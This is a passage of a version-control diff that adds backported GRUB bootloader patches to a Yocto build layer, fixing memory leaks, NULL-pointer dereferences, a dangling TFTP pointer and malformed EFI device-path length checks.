+@@ -270,6 +270,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
+ 		   hook_data))
+ 	{
+ 	  grub_free (ctx.scanline_events);
++	  grub_free (present);
+ 	  return GRUB_ERR_NONE;
+ 	}
+ 
+@@ -282,6 +283,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
+     }
+ 
+   grub_free (ctx.scanline_events);
++  grub_free (present);
+   return GRUB_ERR_NONE;
+ }
+ 
diff --git a/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
new file mode 100644
index 0000000000..d00821f5c3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
@@ -0,0 +1,39 @@
+From f216a75e884ed5e4e94bf86965000dde51148f94 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 27 Nov 2020 15:10:26 +0000
+Subject: [PATCH] net/net: Fix possible dereference to of a NULL pointer
+
+It is always possible that grub_zalloc() could fail, so we should check for
+a NULL return. Otherwise we run the risk of dereferencing a NULL pointer.
+
+Fixes: CID 296221
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03f2515ae0c503406f1a99a2178405049c6555db]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/net/net.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/net/net.c b/grub-core/net/net.c
+index 38f19df..7c2cdf2 100644
+--- a/grub-core/net/net.c
++++ b/grub-core/net/net.c
+@@ -86,8 +86,13 @@ grub_net_link_layer_add_address (struct grub_net_card *card,
+ 
+   /* Add sender to cache table.  */
+   if (card->link_layer_table == NULL)
+-    card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
+-					  * sizeof (card->link_layer_table[0]));
++    {
++      card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
++					    * sizeof (card->link_layer_table[0]));
++      if (card->link_layer_table == NULL)
++	return;
++    }
++
+   entry = &(card->link_layer_table[card->new_ll_entry]);
+   entry->avail = 1;
+   grub_memcpy (&entry->ll_address, ll, sizeof (entry->ll_address));
diff --git a/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
new file mode 100644
index 0000000000..3b4633507d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
@@ -0,0 +1,33 @@
+From 09cc0df477758b60f51fbc0da1dee2f5d54c333d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 19 Feb 2021 17:12:23 +0000
+Subject: [PATCH] net/tftp: Fix dangling memory pointer
+
+The static code analysis tool, Parfait, reported that the valid of
+file->data was left referencing memory that was freed by the call to
+grub_free(data) where data was initialized from file->data.
+
+To ensure that there is no unintentional access to this memory
+referenced by file->data we should set the pointer to NULL.
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0cb838b281a68b536a09681f9557ea6a7ac5da7a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/net/tftp.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/net/tftp.c b/grub-core/net/tftp.c
+index 7d90bf6..f76b19f 100644
+--- a/grub-core/net/tftp.c
++++ b/grub-core/net/tftp.c
+@@ -468,6 +468,7 @@ tftp_close (struct grub_file *file)
+     }
+   destroy_pq (data);
+   grub_free (data);
++  file->data = NULL;
+   return GRUB_ERR_NONE;
+ }
+ 
diff --git a/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
new file mode 100644
index 0000000000..933416605c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
@@ -0,0 +1,50 @@
+From 8861fa6226f7229105722ba669465e879b56ee2b Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 22 Jan 2021 12:32:41 +0000
+Subject: [PATCH] kern/parser: Fix resource leak if argc == 0
+
+After processing the command-line yet arriving at the point where we are
+setting argv, we are allocating memory, even if argc == 0, which makes
+no sense since we never put anything into the allocated argv.
+
+The solution is to simply return that we've successfully processed the
+arguments but that argc == 0, and also ensure that argv is NULL when
+we're not allocating anything in it.
+
+There are only 2 callers of this function, and both are handling a zero
+value in argc assuming nothing is allocated in argv.
+
+Fixes: CID 96680
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d06161b035dde4769199ad65aa0a587a5920012b]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/parser.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
+index 619db31..d1cf061 100644
+--- a/grub-core/kern/parser.c
++++ b/grub-core/kern/parser.c
+@@ -146,6 +146,7 @@ grub_parser_split_cmdline (const char *cmdline,
+   int i;
+ 
+   *argc = 0;
++  *argv = NULL;
+   do
+     {
+       if (!rd || !*rd)
+@@ -207,6 +208,10 @@ grub_parser_split_cmdline (const char *cmdline,
+       (*argc)++;
+     }
+ 
++  /* If there are no args, then we're done. */
++  if (!*argc)
++    return 0;
++
+   /* Reserve memory for the return values.  */
+   args = grub_malloc (bp - buffer);
+   if (!args)
diff --git a/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
new file mode 100644
index 0000000000..04748befc8
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
@@ -0,0 +1,235 @@
+From 16a4d739b19f8680cf93a3c8fa0ae9fc1b1c310b Mon Sep 17 00:00:00 2001
+From: Peter Jones <pjones@redhat.com>
+Date: Sun, 19 Jul 2020 16:53:27 -0400
+Subject: [PATCH] efi: Fix some malformed device path arithmetic errors
+
+Several places we take the length of a device path and subtract 4 from
+it, without ever checking that it's >= 4. There are also cases where
+this kind of malformation will result in unpredictable iteration,
+including treating the length from one dp node as the type in the next
+node. These are all errors, no matter where the data comes from.
+
+This patch adds a checking macro, GRUB_EFI_DEVICE_PATH_VALID(), which
+can be used in several places, and makes GRUB_EFI_NEXT_DEVICE_PATH()
+return NULL and GRUB_EFI_END_ENTIRE_DEVICE_PATH() evaluate as true when
+the length is too small. Additionally, it makes several places in the
+code check for and return errors in these cases.
+
+Signed-off-by: Peter Jones <pjones@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d2cf823d0e31818d1b7a223daff6d5e006596543]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/efi.c           | 64 +++++++++++++++++++++++++-----
+ grub-core/loader/efi/chainloader.c | 13 +++++-
+ grub-core/loader/i386/xnu.c        |  9 +++--
+ include/grub/efi/api.h             | 14 ++++---
+ 4 files changed, 79 insertions(+), 21 deletions(-)
+
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index ad170c7..6a38080 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -360,7 +360,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ 
+   dp = dp0;
+ 
+-  while (1)
++  while (dp)
+     {
+       grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+       grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -370,9 +370,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+       if (type == GRUB_EFI_MEDIA_DEVICE_PATH_TYPE
+ 	       && subtype == GRUB_EFI_FILE_PATH_DEVICE_PATH_SUBTYPE)
+ 	{
+-	  grub_efi_uint16_t len;
+-	  len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
+-		 / sizeof (grub_efi_char16_t));
++	  grub_efi_uint16_t len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++
++	  if (len < 4)
++	    {
++	      grub_error (GRUB_ERR_OUT_OF_RANGE,
++			  "malformed EFI Device Path node has length=%d", len);
++	      return NULL;
++	    }
++	  len = (len - 4) / sizeof (grub_efi_char16_t);
+ 	  filesize += GRUB_MAX_UTF8_PER_UTF16 * len + 2;
+ 	}
+ 
+@@ -388,7 +394,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+   if (!name)
+     return NULL;
+ 
+-  while (1)
++  while (dp)
+     {
+       grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+       grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -404,8 +410,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ 
+ 	  *p++ = '/';
+ 
+-	  len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
+-		 / sizeof (grub_efi_char16_t));
++	  len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++	  if (len < 4)
++	    {
++	      grub_error (GRUB_ERR_OUT_OF_RANGE,
++			  "malformed EFI Device Path node has length=%d", len);
++	      return NULL;
++	    }
++
++	  len = (len - 4) / sizeof (grub_efi_char16_t);
+ 	  fp = (grub_efi_file_path_device_path_t *) dp;
+ 	  /* According to EFI spec Path Name is NULL terminated */
+ 	  while (len > 0 && fp->path_name[len - 1] == 0)
+@@ -480,7 +493,26 @@ grub_efi_duplicate_device_path (const grub_efi_device_path_t *dp)
+        ;
+        p = GRUB_EFI_NEXT_DEVICE_PATH (p))
+     {
+-      total_size += GRUB_EFI_DEVICE_PATH_LENGTH (p);
++      grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (p);
++
++      /*
++       * In the event that we find a node that's completely garbage, for
++       * example if we get to 0x7f 0x01 0x02 0x00 ... (EndInstance with a size
++       * of 2), GRUB_EFI_END_ENTIRE_DEVICE_PATH() will be true and
++       * GRUB_EFI_NEXT_DEVICE_PATH() will return NULL, so we won't continue,
++       * and neither should our consumers, but there won't be any error raised
++       * even though the device path is junk.
++       *
++       * This keeps us from passing junk down back to our caller.
++       */
++      if (len < 4)
++	{
++	  grub_error (GRUB_ERR_OUT_OF_RANGE,
++		      "malformed EFI Device Path node has length=%d", len);
++	  return NULL;
++	}
++
++      total_size += len;
+       if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (p))
+ 	break;
+     }
+@@ -525,7 +557,7 @@ dump_vendor_path (const char *type, grub_efi_vendor_device_path_t *vendor)
+ void
+ grub_efi_print_device_path (grub_efi_device_path_t *dp)
+ {
+-  while (1)
++  while (GRUB_EFI_DEVICE_PATH_VALID (dp))
+     {
+       grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+       grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -937,7 +969,10 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
+     /* Return non-zero.  */
+     return 1;
+ 
+-  while (1)
++  if (dp1 == dp2)
++    return 0;
++
++  while (GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
+     {
+       grub_efi_uint8_t type1, type2;
+       grub_efi_uint8_t subtype1, subtype2;
+@@ -973,5 +1008,14 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
+       dp2 = (grub_efi_device_path_t *) ((char *) dp2 + len2);
+     }
+ 
++  /*
++   * There's no "right" answer here, but we probably don't want to call a valid
++   * dp and an invalid dp equal, so pick one way or the other.
++   */
++  if (GRUB_EFI_DEVICE_PATH_VALID (dp1) && !GRUB_EFI_DEVICE_PATH_VALID (dp2))
++    return 1;
++  else if (!GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
++    return -1;
++
+   return 0;
+ }
+diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
+index daf8c6b..a8d7b91 100644
+--- a/grub-core/loader/efi/chainloader.c
++++ b/grub-core/loader/efi/chainloader.c
+@@ -156,9 +156,18 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
+ 
+   size = 0;
+   d = dp;
+-  while (1)
++  while (d)
+     {
+-      size += GRUB_EFI_DEVICE_PATH_LENGTH (d);
++      grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (d);
++
++      if (len < 4)
++	{
++	  grub_error (GRUB_ERR_OUT_OF_RANGE,
++		      "malformed EFI Device Path node has length=%d", len);
++	  return NULL;
++	}
++
++      size += len;
+       if ((GRUB_EFI_END_ENTIRE_DEVICE_PATH (d)))
+ 	break;
+       d = GRUB_EFI_NEXT_DEVICE_PATH (d);
+diff --git a/grub-core/loader/i386/xnu.c b/grub-core/loader/i386/xnu.c
+index b7d176b..c50cb54 100644
+--- a/grub-core/loader/i386/xnu.c
++++ b/grub-core/loader/i386/xnu.c
+@@ -516,14 +516,15 @@ grub_cmd_devprop_load (grub_command_t cmd __attribute__ ((unused)),
+ 
+       devhead = buf;
+       buf = devhead + 1;
+-      dpstart = buf;
++      dp = dpstart = buf;
+ 
+-      do
++      while (GRUB_EFI_DEVICE_PATH_VALID (dp) && buf < bufend)
+ 	{
+-	  dp = buf;
+ 	  buf = (char *) buf + GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++	  if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp))
++	    break;
++	  dp = buf;
+ 	}
+-      while (!GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp) && buf < bufend);
+ 
+       dev = grub_xnu_devprop_add_device (dpstart, (char *) buf
+ 					 - (char *) dpstart);
+diff --git a/include/grub/efi/api.h b/include/grub/efi/api.h
+index addcbfa..cf1355a 100644
+--- a/include/grub/efi/api.h
++++ b/include/grub/efi/api.h
+@@ -625,6 +625,7 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
+ #define GRUB_EFI_DEVICE_PATH_TYPE(dp)		((dp)->type & 0x7f)
+ #define GRUB_EFI_DEVICE_PATH_SUBTYPE(dp)	((dp)->subtype)
+ #define GRUB_EFI_DEVICE_PATH_LENGTH(dp)		((dp)->length)
++#define GRUB_EFI_DEVICE_PATH_VALID(dp)		((dp) != NULL && GRUB_EFI_DEVICE_PATH_LENGTH (dp) >= 4)
+ 
+ /* The End of Device Path nodes.  */
+ #define GRUB_EFI_END_DEVICE_PATH_TYPE			(0xff & 0x7f)
+@@ -633,13 +634,16 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
+ #define GRUB_EFI_END_THIS_DEVICE_PATH_SUBTYPE		0x01
+ 
+ #define GRUB_EFI_END_ENTIRE_DEVICE_PATH(dp)	\
+-  (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
+-   && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
+-       == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE))
++  (!GRUB_EFI_DEVICE_PATH_VALID (dp) || \
++   (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
++    && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
++	== GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE)))
+ 
+ #define GRUB_EFI_NEXT_DEVICE_PATH(dp)	\
+-  ((grub_efi_device_path_t *) ((char *) (dp) \
+-                               + GRUB_EFI_DEVICE_PATH_LENGTH (dp)))
++  (GRUB_EFI_DEVICE_PATH_VALID (dp) \
++   ? ((grub_efi_device_path_t *) \
++      ((char *) (dp) + GRUB_EFI_DEVICE_PATH_LENGTH (dp))) \
++   : NULL)
+ 
+ /* Hardware Device Path.  */
+ #define GRUB_EFI_HARDWARE_DEVICE_PATH_TYPE		1
diff --git a/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
new file mode 100644
index 0000000000..9d7327cee6
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
@@ -0,0 +1,30 @@
+From d4fd0243920b71cc6e03cc0cadf23b4fe03c352f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:15:25 +0000
+Subject: [PATCH] kern/efi: Fix memory leak on failure
+
+Free the memory allocated to name before returning on failure.
+
+Fixes: CID 296222
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ed286ceba6015d37a9304f04602451c47bf195d7]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/efi.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index 6a38080..baeeef0 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -415,6 +415,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ 	    {
+ 	      grub_error (GRUB_ERR_OUT_OF_RANGE,
+ 			  "malformed EFI Device Path node has length=%d", len);
++	      grub_free (name);
+ 	      return NULL;
+ 	    }
+ 
diff --git a/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
new file mode 100644
index 0000000000..d55709406b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
@@ -0,0 +1,65 @@
+From be03a18b8767be50f16a845c389fd5ed29aae055 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 11 Dec 2020 15:03:13 +0000
+Subject: [PATCH] kern/efi/mm: Fix possible NULL pointer dereference
+
+The model of grub_efi_get_memory_map() is that if memory_map is NULL,
+then the purpose is to discover how much memory should be allocated to
+it for the subsequent call.
+
+The problem here is that with grub_efi_is_finished set to 1, there is no
+check at all that the function is being called with a non-NULL memory_map.
+
+While this MAY be true, we shouldn't assume it.
+
+The solution to this is to behave as expected, and if memory_map is NULL,
+then don't try to use it and allow memory_map_size to be filled in, and
+return 0 as is done later in the code if the buffer is too small (or NULL).
+
+Additionally, drop unneeded ret = 1.
+
+Fixes: CID 96632
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6aee4bfd6973c714056fb7b56890b8d524e94ee1]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/mm.c | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+
+diff --git a/grub-core/kern/efi/mm.c b/grub-core/kern/efi/mm.c
+index b02fab1..5afcef7 100644
+--- a/grub-core/kern/efi/mm.c
++++ b/grub-core/kern/efi/mm.c
+@@ -328,15 +328,24 @@ grub_efi_get_memory_map (grub_efi_uintn_t *memory_map_size,
+   if (grub_efi_is_finished)
+     {
+       int ret = 1;
+-      if (*memory_map_size < finish_mmap_size)
++
++      if (memory_map != NULL)
+ 	{
+-	  grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
+-	  ret = 0;
++	  if (*memory_map_size < finish_mmap_size)
++	    {
++	      grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
++	      ret = 0;
++	    }
++          else
++	    grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
+ 	}
+       else
+ 	{
+-	  grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
+-	  ret = 1;
++	  /*
++	   * Incomplete, no buffer to copy into, same as
++	   * GRUB_EFI_BUFFER_TOO_SMALL below.
++	   */
++	  ret = 0;
+ 	}
+       *memory_map_size = finish_mmap_size;
+       if (map_key)
diff --git a/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
new file mode 100644
index 0000000000..74ffb559e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
@@ -0,0 +1,59 @@
+From 9d36bce5d516b6379ba3a0dd1a94a9c035838827 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 21 Oct 2020 14:41:27 +0000
+Subject: [PATCH] gnulib/regexec: Resolve unused variable
+
+This is a really minor issue where a variable is being assigned to but
+not checked before it is overwritten again.
+
+The reason for this issue is that we are not building with DEBUG set and
+this in turn means that the assert() that reads the value of the
+variable match_last is being processed out.
+
+The solution, move the assignment to match_last in to an ifdef DEBUG too.
+
+Fixes: CID 292459
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a983d36bd9178d377d2072fd4b11c635fdc404b4]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist                           |  1 +
+ .../lib/gnulib-patches/fix-unused-value.patch      | 14 ++++++++++++++
+ 2 files changed, 15 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-unused-value.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 46c4e95..9b01152 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+ 
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
+ 
+diff --git a/grub-core/lib/gnulib-patches/fix-unused-value.patch b/grub-core/lib/gnulib-patches/fix-unused-value.patch
+new file mode 100644
+index 0000000..ba51f1b
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-unused-value.patch
+@@ -0,0 +1,14 @@
++--- a/lib/regexec.c	2020-10-21 14:25:35.310195912 +0000
+++++ b/lib/regexec.c	2020-10-21 14:32:07.961765604 +0000
++@@ -828,7 +828,11 @@
++ 		    break;
++ 		  if (__glibc_unlikely (err != REG_NOMATCH))
++ 		    goto free_return;
+++#ifdef DEBUG
+++		  /* Only used for assertion below when DEBUG is set, otherwise
+++		     it will be over-written when we loop around.  */
++ 		  match_last = -1;
+++#endif
++ 		}
++ 	      else
++ 		break; /* We found a match.  */
diff --git a/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
new file mode 100644
index 0000000000..b6e3c7edbe
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
@@ -0,0 +1,53 @@
+From 2af8df02cca7fd4b584575eac304cd03fa23f5cc Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 22 Oct 2020 13:54:06 +0000
+Subject: [PATCH] gnulib/regcomp: Fix uninitialized token structure
+
+The code is assuming that the value of br_token.constraint was
+initialized to zero when it wasn't.
+
+While some compilers will ensure that, not all do, so it is better to
+fix this explicitly than leave it to chance.
+
+Fixes: CID 73749
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=75c3d3cec4f408848f575d6d5e30a95bd6313db0]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist                              |  1 +
+ .../lib/gnulib-patches/fix-uninit-structure.patch     | 11 +++++++++++
+ 2 files changed, 12 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 9b01152..9e55458 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+ 
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-uninit-structure.patch b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+new file mode 100644
+index 0000000..7b4d9f6
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+@@ -0,0 +1,11 @@
++--- a/lib/regcomp.c	2020-10-22 13:49:06.770168928 +0000
+++++ b/lib/regcomp.c	2020-10-22 13:50:37.026528298 +0000
++@@ -3662,7 +3662,7 @@
++   Idx alloc = 0;
++ #endif /* not RE_ENABLE_I18N */
++   reg_errcode_t ret;
++-  re_token_t br_token;
+++  re_token_t br_token = {0};
++   bin_tree_t *tree;
++ 
++   sbcset = (re_bitset_ptr_t) calloc (sizeof (bitset_t), 1);
diff --git a/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
new file mode 100644
index 0000000000..102a494561
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
@@ -0,0 +1,52 @@
+From eaf9da8b5f8349c51cfc89dd8e39a1a61f89790a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 28 Oct 2020 14:43:01 +0000
+Subject: [PATCH] gnulib/argp-help: Fix dereference of a possibly NULL state
+
+All other instances of call to __argp_failure() where there is
+a dgettext() call is first checking whether state is NULL before
+attempting to dereference it to get the root_argp->argp_domain.
+
+Fixes: CID 292436
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3a37bf120a9194c373257c70175cdb5b337bc107]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist                             |  1 +
+ .../lib/gnulib-patches/fix-null-state-deref.patch    | 12 ++++++++++++
+ 2 files changed, 13 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 9e55458..96d7e69 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+ 
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-null-state-deref.patch b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+new file mode 100644
+index 0000000..813ec09
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+@@ -0,0 +1,12 @@
++--- a/lib/argp-help.c	2020-10-28 14:32:19.189215988 +0000
+++++ b/lib/argp-help.c	2020-10-28 14:38:21.204673940 +0000
++@@ -145,7 +145,8 @@
